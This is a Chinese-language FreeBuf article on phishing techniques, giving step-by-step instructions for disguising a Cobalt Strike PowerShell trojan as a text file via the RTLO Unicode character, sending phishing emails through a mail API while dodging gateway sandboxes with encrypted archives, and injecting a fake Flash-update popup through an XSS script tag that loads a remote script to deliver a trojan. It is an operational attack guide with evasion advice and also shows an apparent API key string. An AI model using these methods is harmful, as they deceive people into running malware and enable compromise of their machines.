基于钓鱼攻击的技术点研究

2022-1-26 17:44:37 Author: www.freebuf.com 阅读量:8 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

使用Unicode欺骗文件扩展名

“RTLO”字符全名为“RIGHT-TO-LEFTOVERRIDE”,是一个不可显示的控制类字符,其本质是unicode 字符。“RTLO”字符可使电脑将任意语言的文字内容按倒序排列,最初是用来支持一些从右往左写的语言的文字,比如希伯来语。由于它可以重新排列字符的特性,会被不法分子利用从而达到欺骗目标,使得用户运行某些具有危害性的可执行文件。

我们新建一个txt.bat内容为start calc.exe ,点击重命名选择插入Unicode控制字符,选择RLO 此时文件名称会变为bat.txt。

双击bat.txt就会打开计算器:

这里我们进一步利用,使用cs生成powershell木马,将其保存为test.bat。下载安装BAT2EXE,打开该工具,点击open导入前面创建的test.bat,然后将“notepad”添加到test.bat的顶部,点击右侧的icon选择一个txt文本图标。然后将Exe格式更改为“ 64位Windows |(不可见)”,以防止在目标用户打开文件时弹出任何终端,最后点击Convert。然后单击“保存”。利用CRL将txt.exe转换为exe.txt。打开记事本,此时会新增一个进程notepad目标用户可以资产操作,当用户关闭此txt时会新增一个powershell进程。这样做会使目标用户相信他们刚刚单击的文件确实是合法的文本文件。此时已成功上线。

邮件钓鱼

在该网址https://www.sendcloud.net注册一个账号,登录成功后,自带一个域名,也可以配置自己的域名,依次点击发送设置---->新增域名,输入自己的域名后点击配置,如下图所示,这里要在自己的域名处按照系统的要求进行解析配置(未配置前是红色X),域名配置好后,点击检测配置,状态变绿通过检测就可以正常使用了。这里是阿里云域名的解析设置:域名配置好后,点击发送设置---->API_USER,创建一个api_user会生成一个API_KEY,这个key要保存下来,后面发送邮件会用的到。e7c0034b0394ecc987daabad4858a694创建完成之后可以在发送相关模块测试邮件发送。这边会收到投递回应。可以使用官方提供的邮件API脚本,官方已经提供各种语言的脚本。

这里使用官方提供的python脚本来进行测试,在脚本中修改相应的内容即可,这里附件木马进行免杀,有的邮件网关的沙箱功能(会把邮件中的附件下载下来运行来反病毒)可能会被拦截,可以将木马文件进行加密压缩,这样沙箱解压不了文件进行检测。然后在钓鱼邮件中告知附件解压:密码(在邮件中不要出现密码这两个字,可能会被邮件网关拦截)。填好信息后,使用python2运行脚本即可,此时我们可以看到我们的邮箱已经收到了邮件。

flash钓鱼

我这里使用的是旧版的falsh,项目地址:https://github.com/r00tSe7en/Flash-Pop

这里需要在flash.js文件中将下载木马的地址改成自己的,最好注册一个跟flash官网域名相似的域名。使用CS的插件生产一个免杀木马,然后将木马软件替换成flash的图标。这里使用exe,更换图标的方法具体请看此链接:https://blog.csdn.net/qq_37248820/article/details/86495439更换好图标之后将木马上传到服务器上,我们可以在存在xss的地方插入,这里使用script标签构造:

payload:<script src="http://www.xx.com/flash/flash.js"></script>

当目标访问此网站时,就会弹框提示flash版本过低请及时升级。如果用户点击立即升级下载安装后,CS成功上线。


From: https://www.freebuf.com/articles/network/320964.html